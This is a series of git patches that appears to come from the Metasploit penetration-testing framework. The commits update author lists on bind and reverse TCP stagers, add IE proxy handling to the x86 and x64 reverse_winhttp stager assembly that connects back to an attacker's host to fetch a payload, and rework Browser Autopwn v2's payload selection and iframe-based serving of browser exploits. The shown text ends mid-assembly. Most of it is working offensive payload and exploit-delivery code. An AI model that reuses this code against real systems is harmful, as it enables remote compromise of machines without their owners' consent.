       'Name'        => 'Bind TCP Stager with UUID Support',
       'Description' => 'Listen for a connection with UUID Support',
-      'Author'      => ['egypt'],
+      'Author'      => [ 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'php',
       'Arch'        => ARCH_PHP,
       'Handler'     => Msf::Handler::BindTcp,
       'Stager'      => { 'Payload' => "" }
-      ))
+    ))
   end
 
   def include_send_uuid
diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
index 91c2de5a5d..9cf8fbed77 100644
--- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb
@@ -22,7 +22,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'PHP Reverse TCP Stager',
       'Description' => 'Reverse PHP connect back stager with checks for disabled functions',
-      'Author'      => 'egypt',
+      'Author'      => [ 'egypt', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'php',
       'Arch'        => ARCH_PHP,
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
index b0a0907882..955625dd12 100644
--- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
@@ -23,7 +23,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',
       'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',
-      'Author'      => ['hdm', 'skape', 'sf'],
+      'Author'      => [ 'hdm', 'skape', 'sf', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86,
diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
index e95e507495..bb8326d4f1 100644
--- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
@@ -23,7 +23,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Bind TCP Stager with UUID Support (Windows x86)',
       'Description' => 'Listen for a connection with UUID Support (Windows x86)',
-      'Author'      => ['OJ Reeves'],
+      'Author'      => [ 'hdm', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86,
diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
index f0617111d1..c77c5d056a 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -23,7 +23,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Reverse TCP Stager with UUID Support',
       'Description' => 'Connect back to the attacker with UUID Support',
-      'Author'      => ['OJ Reeves'],
+      'Author'      => [ 'hdm', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86,
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
index a23f337148..dfdd4ce73c 100644
--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
@@ -22,14 +22,14 @@ module Metasploit4
     super(merge_info(info,
       'Name'          => 'Windows x64 IPv6 Bind TCP Stager with UUID Support',
       'Description'   => 'Listen for an IPv6 connection with UUID Support (Windows x64)',
-      'Author'        => [ 'sf' ],
+      'Author'        => [ 'sf', 'OJ Reeves' ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X86_64,
       'Handler'       => Msf::Handler::BindTcp,
       'Convention'    => 'sockrdi',
       'Stager'        => { 'RequiresMidstager' => false }
-      ))
+    ))
   end
 
   def use_ipv6
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
index ab3402808d..00966f3d82 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -22,7 +22,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Bind TCP Stager with UUID Support (Windows x64)',
       'Description' => 'Listen for a connection with UUID Support (Windows x64)',
-      'Author'      => [ 'sf' ],
+      'Author'      => [ 'sf', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86_64,
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
index a71fa5be83..8c21b7ffe1 100644
--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -22,7 +22,7 @@ module Metasploit4
     super(merge_info(info,
       'Name'        => 'Reverse TCP Stager with UUID Support (Windows x64)',
       'Description' => 'Connect back to the attacker with UUID Support (Windows x64)',
-      'Author'      => ['OJ Reeves'],
+      'Author'      => [ 'sf', 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86_64,

From 78176c4335cbd8cb9c6983df7ed0db221ca3fade Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 15:44:35 +1000
Subject: [PATCH 0177/1013] First pass of IE proxy support for winhttp x86

---
 .../core/payload/windows/reverse_winhttp.rb   | 148 +++++++++++++++++-
 1 file changed, 141 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index bfd9d130fe..723c7d0aaf 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -19,6 +19,16 @@ module Payload::Windows::ReverseWinHttp
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows::ReverseHttp
 
+  #
+  # Register reverse_http specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true])
+      ], self.class)
+  end
+
   #
   # Generate the first stage
   #
@@ -27,13 +37,14 @@ module Payload::Windows::ReverseWinHttp
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
-      retry_count: datastore['StagerRetryCount']
+      uri:         generate_small_uri,
+      retry_count: datastore['StagerRetryCount'],
+      proxy_ie:    datastore['PayloadProxyIE']
     }
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]              = generate_uri
+      conf[:uri]              = generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]
       conf[:proxy_host]       = datastore['PayloadProxyHost']
@@ -41,7 +52,6 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_user]       = datastore['PayloadProxyUser']
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
-      conf[:retry_count]      = datastore['StagerRetryCount']
     end
 
     generate_reverse_winhttp(conf)
@@ -105,7 +115,7 @@ module Payload::Windows::ReverseWinHttp
   # Generate an assembly stub with the configured feature set and options.
   #
   # @option opts [Bool] :ssl Whether or not to enable SSL
-  # @option opts [String] :url The URI to request during staging
+  # @option opts [String] :uri The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Fixnum] :port The port to connect to
   # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil
@@ -117,9 +127,22 @@ module Payload::Windows::ReverseWinHttp
     retry_count       = [opts[:retry_count].to_i, 1].max
     verify_ssl        = nil
     encoded_cert_hash = nil
-    encoded_url       = asm_generate_wchar_array(opts[:url])
+    encoded_uri       = asm_generate_wchar_array(opts[:uri])
     encoded_host      = asm_generate_wchar_array(opts[:host])
 
+    # this is used by the IE proxy functionality when an autoconfiguration URL
+    # is specified. We need the full URL otherwise the call to resolve the proxy
+    # for the URL doesn't work.
+    full_url = 'http'
+    full_url << 's' if opts[:ssl]
+    full_url << '://' << opts[:host]
+    full_url << ":#{opts[:port]}" if opts[:ssl] && opts[:port] != 443
+    full_url << ":#{opts[:port]}" if !opts[:ssl] && opts[:port] != 80
+    full_url << opts[:uri]
+
+    encoded_full_url = asm_generate_wchar_array(full_url)
+    encoded_uri_index = full_url.rindex('/') * 2
+
     if opts[:ssl] && opts[:verify_cert_hash]
       verify_ssl = true
       encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",")
@@ -164,6 +187,14 @@ module Payload::Windows::ReverseWinHttp
         0x00000100 ) # WINHTTP_FLAG_BYPASS_PROXY_CACHE
     end
 
+    ie_proxy_autodect = (
+      0x00000001 | # WINHTTP_AUTO_DETECT_TYPE_DHCP
+      0x00000002 ) # WINHTTP_AUTO_DETECT_TYPE_DNS_A
+
+    ie_proxy_flags = (
+      0x00000001 | # WINHTTP_AUTOPROXY_AUTO_DETECT
+      0x00000002 ) # WINHTTP_AUTOPROXY_CONFIG_URL
+
     asm = %Q^
       ; Input: EBP must be the address of 'api_call'.
       ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
@@ -218,14 +249,34 @@ module Payload::Windows::ReverseWinHttp
       ^
     end
 
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        push eax               ; Session handle is required later for ie proxy
+      ^
+    end
+
     asm << %Q^
       WinHttpConnect:
         push ebx               ; Reserved (NULL)
         push #{opts[:port]}    ; Port [3]
         call got_server_uri    ; Double call to get pointer for both server_uri and
       server_uri:              ; server_host; server_uri is saved in edi for later
-        db #{encoded_url}
+      ^
+
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        db #{encoded_full_url}
       got_server_host:
+        add edi, #{encoded_uri_index} ; move edi up to where the URI starts
+      ^
+    else
+      asm << %Q^
+        db #{encoded_uri}
+      got_server_host:
+      ^
+    end
+
+    asm << %Q^
         push eax               ; Session handle returned by WinHttpOpen
         push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
         call ebp
@@ -275,6 +326,89 @@ module Payload::Windows::ReverseWinHttp
         push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
         call ebp
       ^
+    elsif opts[:proxy_ie] == true
+      asm << %Q^
+        ; allocate space for WINHTTP_CURRENT_USER_IE_PROXY_CONFIG, which is
+        ; a 16-byte structure
+        sub esp, 16
+        mov eax, esp           ; store a pointer to the buffer
+        push edi               ; store the current URL in case it's needed
+        mov edi, eax           ; put the buffer pointer in edi
+        push edi               ; Push a pointer to the buffer
+        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
+        call ebp
+
+        test eax, eax          ; skip the rest of the proxy stuff if the call failed
+        jz ie_proxy_setup_finish
+
+        ; check the "auto detect" flag to see if it's set, if it is, jump to the
+        ; end and let things carry on as they were
+        mov eax, [edi]
+        test eax, eax
+        jnz ie_proxy_setup_finish
+
+        ; if auto detect isn't on, check if there's an auto configuration URL
+        mov eax, [edi+4]
+        test eax, eax
+        jz ie_proxy_manual
+
+        ; restore the URL we need to reference
+        pop edx
+        sub edx, #{encoded_uri_index} ; move edx up to where the full URL starts
+
+        ; set up the autoproxy structure on the stack
+        push 1                 ; fAutoLogonIfChallenged (1=TRUE)
+        push ebx               ; dwReserved (0)
+        push ebx               ; lpReserved (NULL)
+        push eax               ; lpszAutoConfigUrl
+        push #{ie_proxy_autodect} ; dwAutoDetectFlags
+        push #{ie_proxy_flags} ; dwFlags
+        mov eax, esp
+
+        ; prepare space for the resulting proxy info structure
+        sub esp, 12
+        mov edi, esp           ; store the proxy pointer
+
+        ; prepare the WinHttpGetProxyForUrl call
+        push edi               ; pProxyInfo
+        push eax               ; pAutoProxyOptions
+        push edx               ; lpcwszUrl
+        lea eax, [esp+64]      ; Find the pointer to the hSession - HACK!
+        push [eax]             ; hSession
+        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
+        call ebp
+
+        test eax, eax          ; skip the rest of the proxy stuff if the call failed
+        jz ie_proxy_setup_finish
+        jmp set_ie_proxy       ; edi points to the filled out proxy structure
+
+      ie_proxy_manual:
+        ; check to see if a manual proxy is specified, if not, we skip
+        mov eax, [edi+8]
+        test eax, eax
+        jz ie_proxy_setup_finish
+
+        ; manual proxy present, set up the proxy info structure by patching the
+        ; existing current user IE structure that is in edi
+        push 4
+        pop eax
+        add edi, eax           ; skip over the fAutoDetect flag
+        dec eax
+        mov [edi], eax         ; set dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY)
+
+        ; fallthrough to set the ie proxy
+
+      set_ie_proxy:
+        ; we assume that edi is going to point to the proxy options
+        push 12                ; dwBufferLength (sizeof proxy options)
+        push edi               ; lpBuffer (pointer to the proxy)
+        push 38                ; dwOption (WINHTTP_OPTION_PROXY)
+        push esi               ; hRequest
+        push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
+        call ebp
+
+      ie_proxy_setup_finish:
+      ^
     end
 
     if opts[:ssl]

From 3efe22d5e22940c625a9d9c3c370f4f956b264f6 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 01:42:34 -0500
Subject: [PATCH 0178/1013] This seems better, slower though

---
 lib/msf/core/exploit/browserautopwnv2.rb | 71 +++++++++++-------------
 1 file changed, 33 insertions(+), 38 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 0d194ea70a..125b0be380 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -22,6 +22,9 @@ module Msf
     # @return [Array] A list of payload job IDs
     attr_reader :payload_job_ids
 
+    # @return [Array] Wanted payloads.
+    attr_reader :wanted_payloads
+
 
     # The default platform-specific payloads and preferred LPORTS.
     # The hash key is the name of the platform that matches what's on the module.
@@ -149,8 +152,8 @@ module Msf
 
       # Set options configurable by the user.
       p = select_payload(xploit)
-      xploit.datastore['PAYLOAD']     = p['payload']
-      xploit.datastore['LPORT']       = p['lport']
+      xploit.datastore['PAYLOAD']     = p.first[:payload_name]
+      xploit.datastore['LPORT']       = p.first[:payload_lport]
       xploit.datastore['SRVHOST']     = datastore['SRVHOST']
       xploit.datastore['JsObfuscate'] = datastore['JsObfuscate'] if datastore['JsObfuscate']
       xploit.datastore['CookieName']  = datastore['CookieName'] if datastore['CookieName']
@@ -272,28 +275,6 @@ module Msf
     end
 
 
-    # Verifies with current active modules and see if the payload is wanted. For example: if only
-    # Windows exploits are being loaded, then there's no point to load payload handlers for Java,
-    # Linux and other ones.
-    #
-    # @param [String] payload_name The payload module path (name).
-    # @return [TrueClass] Payload is wanted.
-    # @return [FalseClass] Payload is not wanted.
-    def is_payload_handler_wanted?(payload_name)
-      p = framework.payloads.create(payload_name)
-      return false unless p
-
-      payload_platforms = p.platform.platforms
-
-      bap_exploits.each do |m|
-        module_platforms = m.platform.platforms
-        return true if payload_platforms.all? { |e| module_platforms.include? e}
-      end
-
-      false
-    end
-
-
     # Returns a payload name. Either this will be the user's choice, or falls back to a default one.
     #
     # @see DEFAULT_PAYLOADS The default settings.
@@ -307,7 +288,6 @@ module Msf
       return payload_name if framework.payloads.keys.include?(payload_name)
 
       default = DEFAULT_PAYLOADS[platform]['payload']
-      print_status("Unknown payload set: #{payload_name}. Falling back to: #{default}.")
 
       # The user has configured some unknown payload that we can't use,
       # fall back to default.
@@ -343,20 +323,13 @@ module Msf
       # Spawn nothing if the user doesn't want to pop sessions.
       return if datastore['MaxSessions'] == 0
 
-      wanted_payloads = []
-      bap_exploits.each do |mod|
-        wanted_payloads << {
-          :payload_name => mod.datastore['PAYLOAD'], :payload_lport => mod.datastore['LPORT']
-        }
-      end
-
       # Don't repeat launching payload handlers
       wanted_payloads.uniq! { |e| e[:payload_name] }
 
       wanted_payloads.each do |wanted|
         multi_handler = framework.modules.create('exploit/multi/handler')
 
-        # We have to special firefox
+        # We have to special case firefox
         payload_name = wanted[:payload_name].include?('firefox/') ? wanted[:payload_name].gsub('firefox/', 'generic/') : wanted[:payload_name]
 
         # User configurable options
@@ -404,16 +377,35 @@ module Msf
     # @param [Object] m A module that's been initialized.
     # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'
     def select_payload(m)
-      selected_payload = DEFAULT_PAYLOADS['generic']
-      DEFAULT_PAYLOADS.each_pair do |p, info|
-        preferred = info['payload']
+      compatible_payloads = []
+
+      DEFAULT_PAYLOADS.each_pair do |platform, info|
+        payload_name  = get_selected_payload_name(platform)
 
         m.compatible_payloads.each do |k|
-          return info if k[0] == preferred
+          if k[0] == payload_name
+            payload_lport = get_selected_payload_lport(platform)
+            payload_choice = {
+              :payload_name => payload_name,
+              :payload_lport => payload_lport
+            }
+
+            # Module's compatible payloads.
+            compatible_payloads << payload_choice
+
+            # Track all compatible payloads.
+            @wanted_payloads << payload_choice
+
+            # If the module isn't multiple, we assume there is only one payload that needs to be set,
+            # therefore no need to continue.
+            if !m.fullname.include?('multi/')
+              return compatible_payloads
+            end
+          end
         end
       end
 
-      selected_payload
+      compatible_payloads
     end
 
 
@@ -445,6 +437,7 @@ module Msf
       @bap_exploits    = []
       @exploit_job_ids = []
       @payload_job_ids = []
+      @wanted_payloads = []
 
       # #split might be expensive if the file is really big
       @whitelist = datastore['Whitelist'] ? datastore['Whitelist'].split : nil
@@ -722,6 +715,8 @@ module Msf
         end
       end
 
+
+      # Some Flash exploits don't seem to work well with a hidden iframe.
       js = %Q|
       var currentIndex = 0;
       var exploitList = [#{exploit_list.map! {|e| "'#{e}'"} * ", "}];

From 72112317cc171a5cf24483371b52091c865c130a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 01:58:34 -0500
Subject: [PATCH 0179/1013] Update

---
 lib/msf/core/exploit/browserautopwnv2.rb | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 125b0be380..fa030a2f3b 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -48,8 +48,10 @@ module Msf
     # @return [void]
     def init_exploits
       # First we're going to avoid using #find_all because that gets very slow.
-      framework.exploits.each_pair do |fullname, plader_holder|
-        next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
+      framework.exploits.each_pair do |fullname, place_holder|
+        # If the place holder isn't __SYMBOLIC__, then that means the module is initialized,
+        # and that's gotta be the active browser autopwn.
+        next if !fullname.include?('browser') || place_holder != '__SYMBOLIC__'
 
         # The user gets to specify which modules to include/exclude
         next if datastore['Include'] && fullname !~ datastore['Include']
@@ -327,7 +329,7 @@ module Msf
       wanted_payloads.uniq! { |e| e[:payload_name] }
 
       wanted_payloads.each do |wanted|
-        multi_handler = framework.modules.create('exploit/multi/handler')
+        multi_handler = framework.exploits.create('multi/handler')
 
         # We have to special case firefox
         payload_name = wanted[:payload_name].include?('firefox/') ? wanted[:payload_name].gsub('firefox/', 'generic/') : wanted[:payload_name]

From db09b9846c49ae4413a1a0b2b6b5633eebfafe4a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 02:44:57 -0500
Subject: [PATCH 0180/1013] I think I found the speed back

---
 lib/msf/core/exploit/browserautopwnv2.rb | 47 ++++++++++++++++++------
 1 file changed, 35 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index fa030a2f3b..c5b8ec8cda 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -382,11 +382,36 @@ module Msf
       compatible_payloads = []
 
       DEFAULT_PAYLOADS.each_pair do |platform, info|
+        payload_choice = {}
         payload_name  = get_selected_payload_name(platform)
+        payload_lport = get_selected_payload_lport(platform)
 
+        # If the exploit has a platform, we don't have to call the expensive compatible_payloads method
+        begin
+          platform_obj = Msf::Module::Platform.find_platform(platform)
+        rescue ArgumentError
+          platform_obj = nil
+          # No platform obj found
+        end
+
+        if !m.fullname.include?('multi/') && platform_obj && m.platform.platforms.include?(platform_obj)
+            payload_choice = {
+              :payload_name => payload_name,
+              :payload_lport => payload_lport
+            }
+
+            # Module's compatible payloads.
+            compatible_payloads << payload_choice
+
+            # Track all compatible payloads.
+            @wanted_payloads << payload_choice
+
+            return compatible_payloads
+        end
+
+        # Either it's a multi-platform module, or there's no platform information.
         m.compatible_payloads.each do |k|
           if k[0] == payload_name
-            payload_lport = get_selected_payload_lport(platform)
             payload_choice = {
               :payload_name => payload_name,
               :payload_lport => payload_lport
@@ -400,9 +425,7 @@ module Msf
 
             # If the module isn't multiple, we assume there is only one payload that needs to be set,
             # therefore no need to continue.
-            if !m.fullname.include?('multi/')
-              return compatible_payloads
-            end
+            break if !m.fullname.include?('multi/')
           end
         end
       end
@@ -726,14 +749,14 @@ module Msf
       window.onload = function() {
         var e = document.createElement("iframe");
         e.setAttribute("id", "myiframe");
-        if (typeof e.style.setAttribute == 'undefined') {
-          e.setAttribute("style", "visibility:hidden;height:0;width:0;border:0");
-        } else {
-          e.style.setAttribute("visibility", "hidden");
-          e.style.setAttribute("height", "0");
-          e.style.setAttribute("width", "0");
-          e.style.setAttribute("border", "0");
-        }
+        //if (typeof e.style.setAttribute == 'undefined') {
+        //  e.setAttribute("style", "visibility:hidden;height:0;width:0;border:0");
+        //} else {
+        //  e.style.setAttribute("visibility", "hidden");
+        //  e.style.setAttribute("height", "0");
+        //  e.style.setAttribute("width", "0");
+        //  e.style.setAttribute("border", "0");
+        //}
         document.body.appendChild(e);
         setTimeout("loadExploit(currentIndex)", 1000);
       }

From 87bc198c823fbc7abe11fd29261553bc9ce9854f Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 19:18:54 +1000
Subject: [PATCH 0181/1013] x64 winhttp ie proxy support, autoconfig ignore

---
 .../core/payload/windows/reverse_winhttp.rb   |  13 +-
 .../payload/windows/x64/reverse_winhttp.rb    | 151 +++++++++++++++++-
 2 files changed, 148 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index 723c7d0aaf..f2988b1100 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -1,9 +1,6 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/payload/transport_config'
-require 'msf/core/payload/windows/block_api'
-require 'msf/core/payload/windows/exitfunk'
 require 'msf/core/payload/windows/reverse_http'
 
 module Msf
@@ -16,11 +13,10 @@ module Msf
 
 module Payload::Windows::ReverseWinHttp
 
-  include Msf::Payload::TransportConfig
   include Msf::Payload::Windows::ReverseHttp
 
   #
-  # Register reverse_http specific options
+  # Register reverse_winhttp specific options
   #
   def initialize(*args)
     super
@@ -341,11 +337,8 @@ module Payload::Windows::ReverseWinHttp
         test eax, eax          ; skip the rest of the proxy stuff if the call failed
         jz ie_proxy_setup_finish
 
-        ; check the "auto detect" flag to see if it's set, if it is, jump to the
-        ; end and let things carry on as they were
-        mov eax, [edi]
-        test eax, eax
-        jnz ie_proxy_setup_finish
+        ; we don't care about the "auto detect" flag, as it doesn't seem to
+        ; impact us at all.
 
         ; if auto detect isn't on, check if there's an auto configuration URL
         mov eax, [edi+4]
diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
index 9fe09ac40f..a98b36dd7c 100644
--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -16,6 +16,16 @@ module Payload::Windows::ReverseWinHttp_x64
 
   include Msf::Payload::Windows::ReverseHttp_x64
 
+  #
+  # Register reverse_winhttp specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptBool.new('PayloadProxyIE', [false, 'Enable use of IE proxy settings', true])
+      ], self.class)
+  end
+
   #
   # Generate the first stage
   #
@@ -24,13 +34,14 @@ module Payload::Windows::ReverseWinHttp_x64
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
-      retry_count: datastore['StagerRetryCount']
+      uri:         generate_small_uri,
+      retry_count: datastore['StagerRetryCount'],
+      proxy_ie:    datastore['PayloadProxyIE']
     }
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]              = generate_uri
+      conf[:uri]              = generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]
       conf[:proxy_host]       = datastore['PayloadProxyHost']
@@ -102,7 +113,7 @@ module Payload::Windows::ReverseWinHttp_x64
   # Generate an assembly stub with the configured feature set and options.
   #
   # @option opts [Bool] :ssl Whether or not to enable SSL
-  # @option opts [String] :url The URI to request during staging
+  # @option opts [String] :uri The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Fixnum] :port The port to connect to
   # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil
@@ -114,9 +125,22 @@ module Payload::Windows::ReverseWinHttp_x64
     retry_count       = [opts[:retry_count].to_i, 1].max
     verify_ssl        = nil
     encoded_cert_hash = nil
-    encoded_url       = asm_generate_wchar_array(opts[:url])
+    encoded_uri       = asm_generate_wchar_array(opts[:uri])
     encoded_host      = asm_generate_wchar_array(opts[:host])
 
+    # this is used by the IE proxy functionality when an autoconfiguration URL
+    # is specified. We need the full URL otherwise the call to resolve the proxy
+    # for the URL doesn't work.
+    full_url = 'http'
+    full_url << 's' if opts[:ssl]
+    full_url << '://' << opts[:host]
+    full_url << ":#{opts[:port]}" if opts[:ssl] && opts[:port] != 443
+    full_url << ":#{opts[:port]}" if !opts[:ssl] && opts[:port] != 80
+    full_url << opts[:uri]
+
+    encoded_full_url = asm_generate_wchar_array(full_url)
+    encoded_uri_index = full_url.rindex('/') * 2
+
     if opts[:ssl] && opts[:verify_cert_hash]
       verify_ssl = true
       encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",")
@@ -154,6 +178,14 @@ module Payload::Windows::ReverseWinHttp_x64
       http_open_flags |= 0x00800000 # WINHTTP_FLAG_SECURE
     end
 
+    ie_proxy_autodect = (
+      0x00000001 | # WINHTTP_AUTO_DETECT_TYPE_DHCP
+      0x00000002 ) # WINHTTP_AUTO_DETECT_TYPE_DNS_A
+
+    ie_proxy_flags = (
+      0x00000001 | # WINHTTP_AUTOPROXY_AUTO_DETECT
+      0x00000002 ) # WINHTTP_AUTOPROXY_CONFIG_URL
+
     asm = %Q^
         xor rbx, rbx
       load_winhttp:
@@ -207,7 +239,15 @@ module Payload::Windows::ReverseWinHttp_x64
         push rbx                      ; dwFlags (0)
         mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}; WinHttpOpen
         call rbp
+    ^
 
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        mov r12, rax                  ; Session handle is required later for ie proxy
+      ^
+    end
+
+    asm << %Q^
         call load_server_host
         db #{encoded_host}
       load_server_host:
@@ -219,12 +259,34 @@ module Payload::Windows::ReverseWinHttp_x64
         call rbp
 
         call winhttpopenrequest
-        db #{encoded_url}
+    ^
+
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        db #{encoded_full_url}
+      ^
+    else
+      asm << %Q^
+        db #{encoded_uri}
+      ^
+    end
+
+    asm << %Q^
       winhttpopenrequest:
         mov rcx, rax                  ; hConnect
         push rbx
         pop rdx                       ; pwszVerb (NULL=GET)
         pop r8                        ; pwszObjectName (URI)
+    ^
+
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        mov r13, r8                   ; store a copy of the URL for later
+        add r8, #{encoded_uri_index}  ; move r8 up to where the URI stars
+      ^
+    end
+
+    asm << %Q^
         xor r9, r9                    ; pwszVersion (NULL)
         push rbx                      ; stack alignment
         mov rax, #{"0x%.8x" % http_open_flags}  ; dwFlags
@@ -268,6 +330,83 @@ module Payload::Windows::ReverseWinHttp_x64
       ^
     end
 
+    if opts[:proxy_ie] == true && !proxy_enabled
+      asm << %Q^
+        ; allocate space for WINHTTP_CURRENT_USER_IE_PROXY_CONFIG, which is
+        ; a 32-byte structure
+        sub rax, 32
+        mov rdi, rsp                  ; save a pointer to this buffer
+        mov rcx, rdi                  ; this buffer is also the parameter to the function
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} ; WinHttpGetIEProxyConfigForCurrentUser
+        call rbp
+
+        test eax, eax                 ; skip the rest of the proxy stuff if the call failed
+        jz ie_proxy_setup_finish
